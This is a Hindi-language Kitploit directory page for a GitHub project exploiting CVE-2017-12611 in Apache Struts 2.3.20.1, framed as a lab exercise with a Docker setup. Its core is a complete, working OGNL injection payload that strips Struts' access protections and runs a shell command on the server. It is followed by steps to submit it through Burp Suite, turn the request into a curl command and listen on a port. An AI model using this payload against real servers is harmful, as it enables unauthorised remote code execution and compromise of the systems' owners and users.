Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-12611_Exploit — RCE परियोजना | Kitploit
उपकरण/GitHubGitHub/zeynepsilao/cve-2017-12611_exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलैब और अभ्यास
GitHubzeynepsilao/cve-2017-12611_exploit

CVE-2017-12611_Exploit

RCE परियोजना

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-12611 परियोजना

अवलोकन:

दिए गए पेलोड से RCE हमला संभव है।

वातावरण और उपकरण

निम्नलिखित एक पृथक, व्यक्तिगत प्रयोगशाला में परीक्षण और सत्यापन के लिए वातावरण और उपकरणों की सूची है।

  • होस्ट OS: Ubuntu 18.04.6
  • हमलावर OS: Kali Linux
  • कंटेनर प्लेटफ़ॉर्म: Docker
  • लक्ष्य एप्लिकेशन स्टैक: Apache Struts 2.3.20.1
  • अतिरिक्त घटक: Burp Suite

वातावरण सेटअप:

निम्नलिखित कमांड का उपयोग करके:

root@kitploit:~
docker compose up -d 

आप वातावरण चला सकते हैं। उसके बाद आप http://<YOUR_IP>:8080/hello.action पर जाकर एक सबमिशन पृष्ठ देख सकते हैं।

पेलोड:

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

RCE हमले को निष्पादित करने के लिए Burp Suite का उपयोग करना आवश्यक है। Burp Suite का उपयोग करते समय, पेलोड सबमिट करें। पेलोड सबमिट करने के बाद सही लॉग (POST) ढूंढें और इसे कर्ल कमांड में बदलें। अंत में, अपनी हमलावर मशीन खोलें और लिसनर पोर्ट से अपना कर्ल कमांड भेजने के बाद पोर्ट पर सुनें।

नोट्स:

सेंसर किए गए क्षेत्र IP पते हैं।

टूल डाउनलोड करें